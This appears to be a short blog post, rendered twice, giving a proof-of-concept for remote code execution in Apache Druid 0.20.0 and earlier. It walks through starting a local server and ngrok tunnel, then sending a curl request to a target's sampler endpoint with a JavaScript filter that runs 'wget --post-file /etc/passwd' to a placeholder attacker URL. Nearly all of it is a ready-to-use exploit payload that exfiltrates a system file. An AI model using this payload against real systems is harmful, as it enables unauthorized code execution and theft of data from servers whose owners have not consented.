Reference: <a target="_blank" href="https://gist.github.com/pikpikcu/d208f19ea222efe21c4a6e6003d57069">pikpikcu</a>
First Download and run temporary server (<a target="_blank" href="https://gist.github.com/mdonkers/63e115cc0c79b4f6b8b3a6b797e485c7">SimpleHTTPServer</a>)
run example: python3 <a href="http://file.py" class="autolinkedURL autolinkedURL-url" target="_blank">file.py</a> 1337
next running ngrok, example: ngrok http 1337
next make post request to redacted
<pre><code>curl "http://redacted.com/druid/indexer/v1/sampler?for=example-manifest" -H 'Content-Type: application/json' --data '{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["https://druid.apache.org/data/example-manifests.tsv"]},"inputFormat":{"type":"tsv","findColumnsFromHeader":true}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"timestamp","missingValue":"2010-01-01T00:00:00Z"},"dimensionsSpec":{},"transformSpec":{"transforms":[],"filter":{"type": "javascript",
 "function": "function(value){return java.lang.Runtime.getRuntime().exec(\"wget --post-file /etc/passwd YOUR_NGROK_URL\")}",
 "dimension": "added",
 "": {
 "enabled": "true"
 }
 }
 }
 },"type":"index","tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":50,"timeoutMs":10000}}'
</code></pre>if vuln you will see request body in your server 
<img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1612450630825/nQUNkfWt8.png" alt="image.png" />

Reference: [pikpikcu](https://gist.github.com/pikpikcu/d208f19ea222efe21c4a6e6003d57069)

First Download and run temporary server ([SimpleHTTPServer](https://gist.github.com/mdonkers/63e115cc0c79b4f6b8b3a6b797e485c7))

run example: **python3 file.py 1337**

next running ngrok, example: **ngrok http 1337**

next make post request to redacted


```
curl "http://redacted.com/druid/indexer/v1/sampler?for=example-manifest" -H 'Content-Type: application/json' --data '{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["https://druid.apache.org/data/example-manifests.tsv"]},"inputFormat":{"type":"tsv","findColumnsFromHeader":true}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"timestamp","missingValue":"2010-01-01T00:00:00Z"},"dimensionsSpec":{},"transformSpec":{"transforms":[],"filter":{"type": "javascript",
                                        "function": "function(value){return java.lang.Runtime.getRuntime().exec(\"wget --post-file /etc/passwd YOUR_NGROK_URL\")}",
                                        "dimension": "added",
                                        "": {
                                                "enabled": "true"
                                        }
                                }
                        }
  },"type":"index","tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":50,"timeoutMs":10000}}'
```
if vuln you will see request body in your server 


![image.png](https://cdn.hashnode.com/res/hashnode/image/upload/v1612450630825/nQUNkfWt8.png)


Just a blog

Just a blog

Apache Druid =< 0.20.0 Remote Code Execution